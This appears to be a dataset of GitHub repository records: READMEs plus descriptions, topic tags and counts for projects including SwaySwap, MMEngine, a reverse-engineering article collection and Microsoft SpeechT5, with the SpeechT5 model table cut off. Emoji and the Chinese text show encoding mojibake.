`DisappearingScaleBar` animations can be configured. ## Contributing Contributions are welcome and encouraged! See [contributing] for more info. ## Support This library is offered via an open source [license](LICENSE). It is not governed by the Google Maps Platform [Technical Support Services Guidelines](https://cloud.google.com/maps-platform/terms/tssg?utm_source=github&utm_medium=documentation&utm_campaign=&utm_content=android_oss), the [SLA](https://cloud.google.com/maps-platform/terms/sla?utm_source=github&utm_medium=documentation&utm_campaign=&utm_content=android_oss), or the [Deprecation Policy](https://cloud.google.com/maps-platform/terms?utm_source=github&utm_medium=documentation&utm_campaign=&utm_content=android_oss) (however, any Google Maps Platform services used by the library remain subject to the Google Maps Platform Terms of Service). This library adheres to [semantic versioning](https://semver.org/) to indicate when backwards-incompatible changes are introduced. If you find a bug, or have a feature request, please [file an issue] on GitHub. If you would like to get answers to technical questions from other Google Maps Platform developers, ask through one of our [developer community channels](https://developers.google.com/maps/developer-community?utm_source=github&utm_medium=documentation&utm_campaign=&utm_content=android_oss) including the Google Maps Platform [Discord server]. [maps-sdk]: https://developers.google.com/maps/documentation/android-sdk [api-key]: https://developers.google.com/maps/documentation/android-sdk/get-api-key [Discord server]: https://discord.gg/hYsWbmk [Javadoc]: https://googlemaps.github.io/android-maps-compose [contributing]: CONTRIBUTING.md [code of conduct]: CODE_OF_CONDUCT.md [file an issue]: https://github.com/googlemaps/android-maps-compose/issues/new/choose [pull request]: https://github.com/googlemaps/android-maps-compose/compare [jetpack-compose]: https://developer.android.com/jetpack/compose
Jetpack Compose composables for the Maps SDK for Android
android,kotlin,jetpack-compose,google-maps,maps,language-extension
58
34
275
261
113
14
5
FuelLabs/swayswap
[![build](https://github.com/FuelLabs/swayswap/actions/workflows/gh-pages.yml/badge.svg)](https://github.com/FuelLabs/swayswap/actions/workflows/gh-pages.yml) [![discord](https://img.shields.io/badge/chat%20on-discord-orange?&logo=discord&logoColor=ffffff&color=7389D8&labelColor=6A7EC2)](https://discord.gg/xfpK4Pe) ![twitter](https://img.shields.io/twitter/follow/SwayLang?style=social) ### โš ๏ธ Support Notice โš ๏ธ **SwaySwap is no longer supported** and will not function for beta-4 and later versions of fuel-core (>0.17.1). If you would like to contribute updating it, a PR will be welcome. --- ## ๐ŸŒด๐Ÿ’ฐ SwaySwap ๐Ÿ’ฐ๐ŸŒด SwaySwap is a blazingly fast DEX built on the fastest modular execution layer: [Fuel](https://fuel.network/). Built with an entirely new language ([Sway](https://github.com/FuelLabs/sway)), virtual machine ([FuelVM](https://github.com/FuelLabs/fuel-specs)), and UTXO-based smart contract blockchain ([Fuel](https://fuel-labs.ghost.io/introducing-fuel-the-fastest-modular-execution-layer/)), you can now experience a demonstration of the next generation of scaling beyond layer-2s and monolithic blockchain design. <!-- [![launch app button](docs/assets/launch-button.png)](https://fuellabs.github.io/swayswap) The above button launches the latest stable version of SwaySwap. To launch the latest unstable version that includes all current changes from the master branch, click [here](https://swayswap.vercel.app/). --> ## ๐Ÿ“— Table of contents - [SwaySwap Features](#-swayswap-features) - [Getting Started](./docs/GETTING_STARTED.md) - [Requirements](./docs/GETTING_STARTED.md#requirements) - [Running Project Locally](./docs/GETTING_STARTED.md#running-project-locally) - [๐Ÿ“š - Getting the Repository](./docs/GETTING_STARTED.md#---getting-the-repository) - [๐Ÿ“ฆ - Install Dependencies](./docs/GETTING_STARTED.md#---install-dependencies) - [๐Ÿ“’ - Run Local Node](./docs/GETTING_STARTED.md#---run-local-node) - [๐Ÿ’ป - Run Web App](./docs/GETTING_STARTED.md#---run-web-app) - [๐Ÿ“— Project Overview](./docs/GETTING_STARTED.md#-project-overview) - [๐Ÿงฐ Useful Scripts](./docs/GETTING_STARTED.md#-useful-scripts) - [Running Tests](./docs/GETTING_STARTED.md#running-tests) - [Run Tests in Development Mode](./docs/GETTING_STARTED.md#run-tests-in-development-mode) - [Run Tests on a Local Test Environment](./docs/GETTING_STARTED.md#run-tests-on-a-local-test-environment) - [Contribution Guide](./docs/CONTRIBUTING.md) - [Finding Something to Work On](./docs/CONTRIBUTING.md#finding-something-to-work-on) - [Contribution Flow](./docs/CONTRIBUTING.md#contribution-flow) - [License](#license) ## ๐Ÿงฐ SwaySwap Features - Faucet coins; use the faucet API to send test ETH to your wallet - Mint tokens; Use the token contract to mint test DAI to your wallet - Create a liquidity pool - Swap tokens - View current pool positions - Add and remove liquidity from a liquidity pool <!-- Add some more space on the top of the gif --> <br /> <br /> <p align="center"> <img alt="preview pages" width="800" src="docs/assets/preview-pages.gif"> </p> ## License The primary license for this repo is `Apache-2.0`, see [`LICENSE`](./LICENSE).
SwaySwap is a blazingly fast DEX built on the fastest modular execution layer: Fuel.
null
28
72
225
211
33
3
3
kannagi0303/yt-dlp-gui
null
Windows GUI for yt-dlp
ffmpeg,yt-dlp,yt-dlp-gui,youtube-dl,downloader,youtube,youtube-dl-gui,youtube-downloader
9
12
21
148
35
1
1
open-mmlab/mmengine
<div align="center"> <img src="https://user-images.githubusercontent.com/58739961/187154444-fce76639-ac8d-429b-9354-c6fac64b7ef8.jpg" width="600"/> <div>&nbsp;</div> <div align="center"> <b><font size="5">OpenMMLab website</font></b> <sup> <a href="https://openmmlab.com"> <i><font size="4">HOT</font></i> </a> </sup> &nbsp;&nbsp;&nbsp;&nbsp; <b><font size="5">OpenMMLab platform</font></b> <sup> <a href="https://platform.openmmlab.com"> <i><font size="4">TRY IT OUT</font></i> </a> </sup> </div> <div>&nbsp;</div> [![PyPI - Python Version](https://img.shields.io/pypi/pyversions/mmengine)](https://pypi.org/project/mmengine/) [![pytorch](https://img.shields.io/badge/pytorch-1.6~2.1-yellow)](#installation) [![PyPI](https://img.shields.io/pypi/v/mmengine)](https://pypi.org/project/mmengine) [![license](https://img.shields.io/github/license/open-mmlab/mmengine.svg)](https://github.com/open-mmlab/mmengine/blob/main/LICENSE) [Introduction](#introduction) | [Installation](#installation) | [Get Started](#get-started) | [๐Ÿ“˜Documentation](https://mmengine.readthedocs.io/en/latest/) | [๐Ÿค”Reporting Issues](https://github.com/open-mmlab/mmengine/issues/new/choose) </div> <div align="center"> English | [็ฎ€ไฝ“ไธญๆ–‡](README_zh-CN.md) </div> <div align="center"> <a href="https://openmmlab.medium.com/" style="text-decoration:none;"> <img src="https://user-images.githubusercontent.com/25839884/219255827-67c1a27f-f8c5-46a9-811d-5e57448c61d1.png" width="3%" alt="" /></a> <img src="https://user-images.githubusercontent.com/25839884/218346358-56cc8e2f-a2b8-487f-9088-32480cceabcf.png" width="3%" alt="" /> <a href="https://discord.com/channels/1037617289144569886/1073056342287323168" style="text-decoration:none;"> <img src="https://user-images.githubusercontent.com/25839884/218347213-c080267f-cbb6-443e-8532-8e1ed9a58ea9.png" width="3%" alt="" /></a> <img src="https://user-images.githubusercontent.com/25839884/218346358-56cc8e2f-a2b8-487f-9088-32480cceabcf.png" width="3%" alt="" /> <a href="https://twitter.com/OpenMMLab" style="text-decoration:none;"> <img src="https://user-images.githubusercontent.com/25839884/218346637-d30c8a0f-3eba-4699-8131-512fb06d46db.png" width="3%" alt="" /></a> <img src="https://user-images.githubusercontent.com/25839884/218346358-56cc8e2f-a2b8-487f-9088-32480cceabcf.png" width="3%" alt="" /> <a href="https://www.youtube.com/openmmlab" style="text-decoration:none;"> <img src="https://user-images.githubusercontent.com/25839884/218346691-ceb2116a-465a-40af-8424-9f30d2348ca9.png" width="3%" alt="" /></a> <img src="https://user-images.githubusercontent.com/25839884/218346358-56cc8e2f-a2b8-487f-9088-32480cceabcf.png" width="3%" alt="" /> <a href="https://space.bilibili.com/1293512903" style="text-decoration:none;"> <img src="https://user-images.githubusercontent.com/25839884/219026751-d7d14cce-a7c9-4e82-9942-8375fca65b99.png" width="3%" alt="" /></a> <img src="https://user-images.githubusercontent.com/25839884/218346358-56cc8e2f-a2b8-487f-9088-32480cceabcf.png" width="3%" alt="" /> <a href="https://www.zhihu.com/people/openmmlab" style="text-decoration:none;"> <img src="https://user-images.githubusercontent.com/25839884/219026120-ba71e48b-6e94-4bd4-b4e9-b7d175b5e362.png" width="3%" alt="" /></a> </div> ## What's New v0.10.4 was released on 2024-4-23. Highlights: - Support custom `artifact_location` in MLflowVisBackend [#1505](#1505) - Enable `exclude_frozen_parameters` for `DeepSpeedEngine._zero3_consolidated_16bit_state_dict` [#1517](#1517) Read [Changelog](./docs/en/notes/changelog.md#v0104-2342024) for more details. ## Introduction MMEngine is a foundational library for training deep learning models based on PyTorch. It serves as the training engine of all OpenMMLab codebases, which support hundreds of algorithms in various research areas. Moreover, MMEngine is also generic to be applied to non-OpenMMLab projects. Its highlights are as follows: **Integrate mainstream large-scale model training frameworks** - [ColossalAI](https://mmengine.readthedocs.io/en/latest/common_usage/large_model_training.html#colossalai) - [DeepSpeed](https://mmengine.readthedocs.io/en/latest/common_usage/large_model_training.html#deepspeed) - [FSDP](https://mmengine.readthedocs.io/en/latest/common_usage/large_model_training.html#fullyshardeddataparallel-fsdp) **Supports a variety of training strategies** - [Mixed Precision Training](https://mmengine.readthedocs.io/en/latest/common_usage/speed_up_training.html#mixed-precision-training) - [Gradient Accumulation](https://mmengine.readthedocs.io/en/latest/common_usage/save_gpu_memory.html#gradient-accumulation) - [Gradient Checkpointing](https://mmengine.readthedocs.io/en/latest/common_usage/save_gpu_memory.html#gradient-checkpointing) **Provides a user-friendly configuration system** - [Pure Python-style configuration files, easy to navigate](https://mmengine.readthedocs.io/en/latest/advanced_tutorials/config.html#a-pure-python-style-configuration-file-beta) - [Plain-text-style configuration files, supporting JSON and YAML](https://mmengine.readthedocs.io/en/latest/advanced_tutorials/config.html) **Covers mainstream training monitoring platforms** - [TensorBoard](https://mmengine.readthedocs.io/en/latest/common_usage/visualize_training_log.html#tensorboard) | [WandB](https://mmengine.readthedocs.io/en/latest/common_usage/visualize_training_log.html#wandb) | [MLflow](https://mmengine.readthedocs.io/en/latest/common_usage/visualize_training_log.html#mlflow-wip) - [ClearML](https://mmengine.readthedocs.io/en/latest/common_usage/visualize_training_log.html#clearml) | [Neptune](https://mmengine.readthedocs.io/en/latest/common_usage/visualize_training_log.html#neptune) | [DVCLive](https://mmengine.readthedocs.io/en/latest/common_usage/visualize_training_log.html#dvclive) | [Aim](https://mmengine.readthedocs.io/en/latest/common_usage/visualize_training_log.html#aim) ## Installation <details> <summary>Supported PyTorch Versions</summary> | MMEngine | PyTorch | Python | | ------------------ | ------------ | -------------- | | main | >=1.6 \<=2.1 | >=3.8, \<=3.11 | | >=0.9.0, \<=0.10.4 | >=1.6 \<=2.1 | >=3.8, \<=3.11 | </details> Before installing MMEngine, please ensure that PyTorch has been successfully installed following the [official guide](https://pytorch.org/get-started/locally/). Install MMEngine ```bash pip install -U openmim mim install mmengine ``` Verify the installation ```bash python -c 'from mmengine.utils.dl_utils import collect_env;print(collect_env())' ``` ## Get Started Taking the training of a ResNet-50 model on the CIFAR-10 dataset as an example, we will use MMEngine to build a complete, configurable training and validation process in less than 80 lines of code. <details> <summary>Build Models</summary> First, we need to define a **model** which 1) inherits from `BaseModel` and 2) accepts an additional argument `mode` in the `forward` method, in addition to those arguments related to the dataset. - During training, the value of `mode` is "loss", and the `forward` method should return a `dict` containing the key "loss". - During validation, the value of `mode` is "predict", and the forward method should return results containing both predictions and labels. ```python import torch.nn.functional as F import torchvision from mmengine.model import BaseModel class MMResNet50(BaseModel): def __init__(self): super().__init__() self.resnet = torchvision.models.resnet50() def forward(self, imgs, labels, mode): x = self.resnet(imgs) if mode == 'loss': return {'loss': F.cross_entropy(x, labels)} elif mode == 'predict': return x, labels ``` </details> <details> <summary>Build Datasets</summary> Next, we need to create **Dataset**s and **DataLoader**s for training and validation. In this case, we simply use built-in datasets supported in TorchVision. ```python import torchvision.transforms as transforms from torch.utils.data import DataLoader norm_cfg = dict(mean=[0.491, 0.482, 0.447], std=[0.202, 0.199, 0.201]) train_dataloader = DataLoader(batch_size=32, shuffle=True, dataset=torchvision.datasets.CIFAR10( 'data/cifar10', train=True, download=True, transform=transforms.Compose([ transforms.RandomCrop(32, padding=4), transforms.RandomHorizontalFlip(), transforms.ToTensor(), transforms.Normalize(**norm_cfg) ]))) val_dataloader = DataLoader(batch_size=32, shuffle=False, dataset=torchvision.datasets.CIFAR10( 'data/cifar10', train=False, download=True, transform=transforms.Compose([ transforms.ToTensor(), transforms.Normalize(**norm_cfg) ]))) ``` </details> <details> <summary>Build Metrics</summary> To validate and test the model, we need to define a **Metric** called accuracy to evaluate the model. This metric needs to inherit from `BaseMetric` and implements the `process` and `compute_metrics` methods. ```python from mmengine.evaluator import BaseMetric class Accuracy(BaseMetric): def process(self, data_batch, data_samples): score, gt = data_samples # Save the results of a batch to `self.results` self.results.append({ 'batch_size': len(gt), 'correct': (score.argmax(dim=1) == gt).sum().cpu(), }) def compute_metrics(self, results): total_correct = sum(item['correct'] for item in results) total_size = sum(item['batch_size'] for item in results) # Returns a dictionary with the results of the evaluated metrics, # where the key is the name of the metric return dict(accuracy=100 * total_correct / total_size) ``` </details> <details> <summary>Build a Runner</summary> Finally, we can construct a **Runner** with previously defined `Model`, `DataLoader`, and `Metrics`, with some other configs, as shown below. ```python from torch.optim import SGD from mmengine.runner import Runner runner = Runner( model=MMResNet50(), work_dir='./work_dir', train_dataloader=train_dataloader, # a wrapper to execute back propagation and gradient update, etc. optim_wrapper=dict(optimizer=dict(type=SGD, lr=0.001, momentum=0.9)), # set some training configs like epochs train_cfg=dict(by_epoch=True, max_epochs=5, val_interval=1), val_dataloader=val_dataloader, val_cfg=dict(), val_evaluator=dict(type=Accuracy), ) ``` </details> <details> <summary>Launch Training</summary> ```python runner.train() ``` </details> ## Learn More <details> <summary>Tutorials</summary> - [Runner](https://mmengine.readthedocs.io/en/latest/tutorials/runner.html) - [Dataset and DataLoader](https://mmengine.readthedocs.io/en/latest/tutorials/dataset.html) - [Model](https://mmengine.readthedocs.io/en/latest/tutorials/model.html) - [Evaluation](https://mmengine.readthedocs.io/en/latest/tutorials/evaluation.html) - [OptimWrapper](https://mmengine.readthedocs.io/en/latest/tutorials/optim_wrapper.html) - [Parameter Scheduler](https://mmengine.readthedocs.io/en/latest/tutorials/param_scheduler.html) - [Hook](https://mmengine.readthedocs.io/en/latest/tutorials/hook.html) </details> <details> <summary>Advanced tutorials</summary> - [Registry](https://mmengine.readthedocs.io/en/latest/advanced_tutorials/registry.html) - [Config](https://mmengine.readthedocs.io/en/latest/advanced_tutorials/config.html) - [BaseDataset](https://mmengine.readthedocs.io/en/latest/advanced_tutorials/basedataset.html) - [Data Transform](https://mmengine.readthedocs.io/en/latest/advanced_tutorials/data_transform.html) - [Weight Initialization](https://mmengine.readthedocs.io/en/latest/advanced_tutorials/initialize.html) - [Visualization](https://mmengine.readthedocs.io/en/latest/advanced_tutorials/visualization.html) - [Abstract Data Element](https://mmengine.readthedocs.io/en/latest/advanced_tutorials/data_element.html) - [Distribution Communication](https://mmengine.readthedocs.io/en/latest/advanced_tutorials/distributed.html) - [Logging](https://mmengine.readthedocs.io/en/latest/advanced_tutorials/logging.html) - [File IO](https://mmengine.readthedocs.io/en/latest/advanced_tutorials/fileio.html) - [Global manager (ManagerMixin)](https://mmengine.readthedocs.io/en/latest/advanced_tutorials/manager_mixin.html) - [Use modules from other libraries](https://mmengine.readthedocs.io/en/latest/advanced_tutorials/cross_library.html) - [Test Time Agumentation](https://mmengine.readthedocs.io/en/latest/advanced_tutorials/test_time_augmentation.html) </details> <details> <summary>Examples</summary> - [Train a GAN](https://mmengine.readthedocs.io/en/latest/examples/train_a_gan.html) </details> <details> <summary>Common Usage</summary> - [Resume Training](https://mmengine.readthedocs.io/en/latest/common_usage/resume_training.html) - [Speed up Training](https://mmengine.readthedocs.io/en/latest/common_usage/speed_up_training.html) - [Save Memory on GPU](https://mmengine.readthedocs.io/en/latest/common_usage/save_gpu_memory.html) </details> <details> <summary>Design</summary> - [Hook](https://mmengine.readthedocs.io/en/latest/design/hook.html) - [Runner](https://mmengine.readthedocs.io/en/latest/design/runner.html) - [Evaluation](https://mmengine.readthedocs.io/en/latest/design/evaluation.html) - [Visualization](https://mmengine.readthedocs.io/en/latest/design/visualization.html) - [Logging](https://mmengine.readthedocs.io/en/latest/design/logging.html) - [Infer](https://mmengine.readthedocs.io/en/latest/design/infer.html) </details> <details> <summary>Migration guide</summary> - [Migrate Runner from MMCV to MMEngine](https://mmengine.readthedocs.io/en/latest/migration/runner.html) - [Migrate Hook from MMCV to MMEngine](https://mmengine.readthedocs.io/en/latest/migration/hook.html) - [Migrate Model from MMCV to MMEngine](https://mmengine.readthedocs.io/en/latest/migration/model.html) - [Migrate Parameter Scheduler from MMCV to MMEngine](https://mmengine.readthedocs.io/en/latest/migration/param_scheduler.html) - [Migrate Data Transform to OpenMMLab 2.0](https://mmengine.readthedocs.io/en/latest/migration/transform.html) </details> ## Contributing We appreciate all contributions to improve MMEngine. Please refer to [CONTRIBUTING.md](CONTRIBUTING.md) for the contributing guideline. ## Citation If you find this project useful in your research, please consider cite: ``` @article{mmengine2022, title = {{MMEngine}: OpenMMLab Foundational Library for Training Deep Learning Models}, author = {MMEngine Contributors}, howpublished = {\url{https://github.com/open-mmlab/mmengine}}, year={2022} } ``` ## License This project is released under the [Apache 2.0 license](LICENSE). ## Ecosystem - [APES: Attention-based Point Cloud Edge Sampling](https://github.com/JunweiZheng93/APES) - [DiffEngine: diffusers training toolbox with mmengine](https://github.com/okotaku/diffengine) ## Projects in OpenMMLab - [MIM](https://github.com/open-mmlab/mim): MIM installs OpenMMLab packages. - [MMCV](https://github.com/open-mmlab/mmcv): OpenMMLab foundational library for computer vision. - [MMEval](https://github.com/open-mmlab/mmeval): A unified evaluation library for multiple machine learning libraries. - [MMPreTrain](https://github.com/open-mmlab/mmpretrain): OpenMMLab pre-training toolbox and benchmark. - [MMagic](https://github.com/open-mmlab/mmagic): Open**MM**Lab **A**dvanced, **G**enerative and **I**ntelligent **C**reation toolbox. - [MMDetection](https://github.com/open-mmlab/mmdetection): OpenMMLab detection toolbox and benchmark. - [MMYOLO](https://github.com/open-mmlab/mmyolo): OpenMMLab YOLO series toolbox and benchmark. - [MMDetection3D](https://github.com/open-mmlab/mmdetection3d): OpenMMLab's next-generation platform for general 3D object detection. - [MMRotate](https://github.com/open-mmlab/mmrotate): OpenMMLab rotated object detection toolbox and benchmark. - [MMTracking](https://github.com/open-mmlab/mmtracking): OpenMMLab video perception toolbox and benchmark. - [MMPose](https://github.com/open-mmlab/mmpose): OpenMMLab pose estimation toolbox and benchmark. - [MMSegmentation](https://github.com/open-mmlab/mmsegmentation): OpenMMLab semantic segmentation toolbox and benchmark. - [MMOCR](https://github.com/open-mmlab/mmocr): OpenMMLab text detection, recognition, and understanding toolbox. - [MMHuman3D](https://github.com/open-mmlab/mmhuman3d): OpenMMLab 3D human parametric model toolbox and benchmark. - [MMSelfSup](https://github.com/open-mmlab/mmselfsup): OpenMMLab self-supervised learning toolbox and benchmark. - [MMFewShot](https://github.com/open-mmlab/mmfewshot): OpenMMLab fewshot learning toolbox and benchmark. - [MMAction2](https://github.com/open-mmlab/mmaction2): OpenMMLab's next-generation action understanding toolbox and benchmark. - [MMFlow](https://github.com/open-mmlab/mmflow): OpenMMLab optical flow toolbox and benchmark. - [MMDeploy](https://github.com/open-mmlab/mmdeploy): OpenMMLab model deployment framework. - [MMRazor](https://github.com/open-mmlab/mmrazor): OpenMMLab model compression toolbox and benchmark. - [Playground](https://github.com/open-mmlab/playground): A central hub for gathering and showcasing amazing projects built upon OpenMMLab.
OpenMMLab Foundational Library for Training Deep Learning Models
computer-vision,deep-learning,pytorch,ai,machine-learning,python
26
146
1,059
888
134
23
4
darbra/sperm
# ็ฒพๅฝฉ้€†ๅ‘ๆ–‡็ซ  ่ฟ™ไบ›ๅฅฝๆ–‡ๅ‡ๆฅ่‡ชๅ…ฌไผ—ๅทใ€52pojieใ€็œ‹้›ชใ€csdnใ€jianshu็ญ‰ๅนณๅฐ๏ผŒๅนถ้€š่ฟ‡็ฎ€ๆ‚ฆๅฏผๅ‡บmarkdown๏ผŒๅธŒๆœ›ๅœจไธ็ปๆ„้—ดๅฏน่€ๅธˆไปฌๆœ‰ๆ‰€ๅธฎๅŠฉใ€‚ ่ฟ™ไบ›ๅ€พๅ›Š็›ธๆŽˆ็š„ๅˆ†ไบซไป…็”จไบŽๅญฆไน ไบคๆต๏ผŒ่ฏทๅ‹ฟ็”จไบŽ้žๆณ•็”จ้€”๏ผŒๅฆๅˆ™ๅŽๆžœ่‡ช่ดŸใ€‚
ๆต่งˆ่ฟ‡็š„็ฒพๅฝฉ้€†ๅ‘ๆ–‡็ซ ๆฑ‡ๆ€ป๏ผŒๅ€ผๅพ—ไธ€็œ‹
frida,unidbg,crawler,spider,crawl
0
1
1
82
0
1
0
microsoft/SpeechT5
# SpeechT5 Unified-modal speech-text pre-training for spoken language processing: > [**SpeechT5**](https://arxiv.org/abs/2110.07205) (```ACL 2022```): **SpeechT5: Unified-Modal Encoder-Decoder Pre-training for Spoken Language Processing** > [**Speech2C**](https://arxiv.org/abs/2203.17113) (```INTERSPEECH 2022```): **Pre-Training Transformer Decoder for End-to-End ASR Model with Unpaired Speech Data** > [**YiTrans**](https://arxiv.org/abs/2206.05777) (```IWSLT 2022```): **The YiTrans End-to-End Speech Translation System for IWSLT 2022 Offline Shared Task** > [**SpeechUT**](https://arxiv.org/abs/2210.03730) (```EMNLP 2022```): **SpeechUT: Bridging Speech and Text with Hidden-Unit for Encoder-Decoder Based Speech-Text Pre-training** > [**SpeechLM**](https://arxiv.org/abs/2209.15329) (```IEEE/ACM TASLP```): **SpeechLM: Enhanced Speech Pre-Training with Unpaired Textual Data** > [**Speech2S**](https://arxiv.org/abs/2210.17027) (```ICASSP 2023```): **Joint Pre-Training with Speech and Bilingual Text for Direct Speech to Speech Translation** > [**Prosody-SpeechT5**](https://ieeexplore.ieee.org/document/10096530/) (```ICASSP 2023```): **Prosody-aware SpeechT5 for Expressive Neural TTS** > [**VATLM**](https://arxiv.org/abs/2211.11275) (```IEEE Transactions on Multimedia```): **VATLM: Visual-Audio-Text Pre-Training with Unified Masked Prediction for Speech Representation Learning** > [**VALL-E X**](https://arxiv.org/abs/2303.03926) (```Arxiv 2023```): **Speak Foreign Languages with Your Own Voice: Cross-Lingual Neural Codec Language Modeling** > [**VioLA**](https://arxiv.org/abs/2305.16107) (```Arxiv 2023```): **VioLA: Unified Codec Language Models for Speech Recognition, Synthesis, and Translation** > [**WavLLM**](https://arxiv.org/abs/2404.00656) (```Arxiv 2024```): **WavLLM: Towards Robust and Adaptive Speech Large Language Model** <!-- Model introductions, evaluation results, and model inference instructions are located in the corresponding folders. The source code is [https://github.com/microsoft/SpeechT5/tree/main/ModelName]. --> ## Update - April, 2024: WavLLM [**Arxiv**](https://arxiv.org/abs/2404.00656). - March, 2024: [**SpeechLM**](https://arxiv.org/abs/2209.15329) was accepted by IEEE/ACM Transactions on Audio, Speech, and Language Processing. - May, 2023: VioLA [**Arxiv**](https://arxiv.org/abs/2305.16107). - May, 2023: [**VATLM**](https://arxiv.org/abs/2211.11275) was accepted by IEEE Transactions on Multimedia. - March, 2023: VALL-E X [**Arxiv**](https://arxiv.org/abs/2303.03926) and [**Demo**](https://aka.ms/vallex). - February, 2023: [**Speech2S**](https://arxiv.org/abs/2210.17027) and [**Prosody-SpeechT5**](https://arxiv.org/abs/2211.11275) were accepted by ICASSP 2023. - [HuggingFace Integration] February, 2023: [**SpeechT5**](https://aclanthology.org/2022.acl-long.393/) models are on [**HuggingFace**](https://huggingface.co/blog/speecht5). - [Model Release] November, 2022: [**VATLM**](https://github.com/microsoft/SpeechT5/tree/main/VATLM) models are released. - November, 2022: VATLM [**Arxiv**](https://arxiv.org/abs/2211.11275). - November, 2022: Speech2S [**Arxiv**](https://arxiv.org/abs/2210.17027). - [Model Release] October, 2022: [**SpeechUT**](https://github.com/microsoft/SpeechT5/tree/main/SpeechUT) models are released. - October, 2022: [**SpeechUT**](https://arxiv.org/abs/2210.03730) was accepted by EMNLP 2022. - [Model Release] October, 2022: [**SpeechLM**](https://github.com/microsoft/SpeechT5/tree/main/SpeechLM) models are released. - September, 2022: SpeechLM [**Arxiv**](https://arxiv.org/abs/2209.15329). - [Evaluation] June, 2022: The end-to-end ST system [**YiTrans**](https://arxiv.org/abs/2206.05777) achieved top results on [**IWSLT 2022**](https://iwslt.org/2022/offline) shared tasks. - June, 2022: [**Speech2C**](https://www.isca-speech.org/archive/interspeech_2022/ao22_interspeech.html) was accepted by InterSpeech 2022. - [Model Release] May, 2022: [**Speech2C**](https://github.com/microsoft/SpeechT5/tree/main/Speech2C) models are released. - [Model Release] April, 2022: [**SpeechT5**](https://github.com/microsoft/SpeechT5/tree/main/SpeechT5) models are released. - March, 2022: Speech2C [**Arxiv**](https://arxiv.org/abs/2203.17113). - February, 2022: [**SpeechT5**](https://aclanthology.org/2022.acl-long.393/) was accepted by ACL 2022. - October, 2021: SpeechT5 [**Arxiv**](https://arxiv.org/abs/2110.07205). ## Pre-Trained Models | Model | Pre-training Dataset | Fine-tuning Dataset | Model | | :------: | :----------------------------------------------: | :-----------------: | :-----: | | SpeechT5 Base | [960 hrs LibriSpeech](http://www.openslr.org/12) + [LibriSpeech LM Dataset](https://www.openslr.org/11/) | - | [HuggingFace](https://huggingface.co/ajyy/SpeechT5/resolve/main/speecht5_base.pt)<br /> [Google Drive](https://drive.google.com/file/d/1Sq00uZ1pw6Z4OUaqhOWzQEJxIVWgAO5U/view?usp=sharing) | | SpeechT5 Base | [960 hrs LibriSpeech](http://www.openslr.org/12) + [LibriSpeech LM Dataset](https://www.openslr.org/11/) | [100 hrs LibriSpeech](http://www.openslr.org/12) | [HuggingFace](https://huggingface.co/ajyy/SpeechT5/resolve/main/speecht5_base_asr.pt)<br /> [Google Drive](https://drive.google.com/file/d/1qLKJ81JPWOGf1MHfjSmgtZyqqTqgI6kT/view?usp=sharing) | | SpeechT5 Large | [60k hrs Libri-Light](https://github.com/facebookresearch/libri-light) + [LibriSpeech LM Dataset](https://www.openslr.org/11/) | - | [Google Drive](https://drive.google.com/file/d/1M79b1jetSPOVxWVMIX-y0URvDjNskZKp/view?usp=sharing) | | Speech2C | [960 hrs LibriSpeech](http://www.openslr.org/12) | - | [Google Drive](https://drive.google.com/file/d/1nGZ0LWEwlLq2pz7o805YALsMr9irV0Za/view?usp=sharing) | | Speech2C | [960 hrs LibriSpeech](http://www.openslr.org/12) | [10 hrs LibriSpeech](http://www.openslr.org/12) | [Google Drive](https://drive.google.com/file/d/1nWSAc-33LmcDQHzH8IjXVJsuk0JZTWgN/view?usp=sharing) | | Speech2C | [960 hrs LibriSpeech](http://www.openslr.org/12) | [100 hrs LibriSpeech](http://www.openslr.org/12) | [Google Drive](https://drive.google.com/file/d/1LwbQ5Y3tKZoK3s1ayLQgsfLTFnmkKNZs/view?usp=sharing) | | SpeechLM-P Base | [960 hrs LibriSpeech](http://www.openslr.org/12) + [40M Text](http://www.openslr.org/11) | - | [Google drive](https://drive.google.com/file/d/1iJvhSGghNrMT-wAY1nwVu2YaYuTy1pxx/view?usp=sharing) | | SpeechLM-P Base | [960 hrs LibriSpeech](http://www.openslr.org/12) + [40M Text](http://www.openslr.org/11) | [100 hrs LibriSpeech](http://www.openslr.org/12) | [Google drive](https://drive.google.com/file/d/1mH3N7iKMWYk3rSBJErQPYf3x5ugqDq5x/view?usp=sharing) | | SpeechLM-H Base | [960 hrs LibriSpeech](http://www.openslr.org/12) + [40M Text](http://www.openslr.org/11) | - | [Google drive](https://drive.google.com/file/d/1eblW8U8f9t-NTuCNRrNHwr-8BeLAUAmQ/view?usp=sharing) | | SpeechLM-H Base | [960 hrs LibriSpeech](http://www.openslr.org/12) + [40M Text](http://www.openslr.org/11) | [100 hrs LibriSpeech](http://www.openslr.org/12) | [Google drive](https://drive.google.com/file/d/1vXyO5DolbiWiTYZ6pkkKQsu2wJetaPlv/view?usp=sharing) | | SpeechLM-P Base | [960 hrs LibriSpeech](http://www.openslr.org/12) + [40M Text](http://www.openslr.org/11) | [En-De CoVoST-2](https://github.com/facebookresearch/covost) | [Azure Storage] | | SpeechLM-P Base | [960 hrs LibriSpeech](http://www.openslr.org/12) + [40M Text](http://www.openslr.org/11) | [En-Ca CoVoST-2](https://github.com/facebookresearch/covost) | [Azure Storage] | | SpeechLM-P Base | [960 hrs LibriSpeech](http://www.openslr.org/12) + [40M Text](http://www.openslr.org/11) | [En-Ar CoVoST-2](https://github.com/facebookresearch/covost) | [Azure Storage] | | SpeechLM-P Base | [960 hrs LibriSpeech](http://www.openslr.org/12) + [40M Text](http://www.openslr.org/11) | [En-Tr CoVoST-2](https://github.com/facebookresearch/covost) | [Azure Storage] | | SpeechLM-P Large | [60k hrs LibriLight](https://github.com/facebookresearch/libri-light) + [40M Text](http://www.openslr.org/11) | - | [Google drive](https://drive.google.com/file/d/1QjLIgTJKIylVIp5hUkfSjGPtz8Xo7Lky/view?usp=sharing) | | SpeechLM-P Large | [60k hrs LibriLight](https://github.com/facebookresearch/libri-light) + [40M Text](http://www.openslr.org/11) | [960 hrs LibriSpeech](http://www.openslr.org/12) | [Google drive](https://drive.google.com/file/d/1YZQDVv096o8Opt0RBnkRiZXYPRDqKZnP/view?usp=sharing) | | SpeechLM-P Large | [60k hrs LibriLight](https://github.com/facebookresearch/libri-light) + [40M Text](http://www.openslr.org/11) | [En-De CoVoST-2](https://github.com/facebookresearch/covost) | [Google drive](https://drive.google.com/file/d/1qYygNWSc11TQbBI1OzC4ChlR-dNh8t9S/view?usp=sharing) | | SpeechLM-P Large | [60k hrs LibriLight](https://github.com/facebookresearch/libri-light) + [40M Text](http://www.openslr.org/11) | [En-Ca CoVoST-2](https://github.com/facebookresearch/covost) | 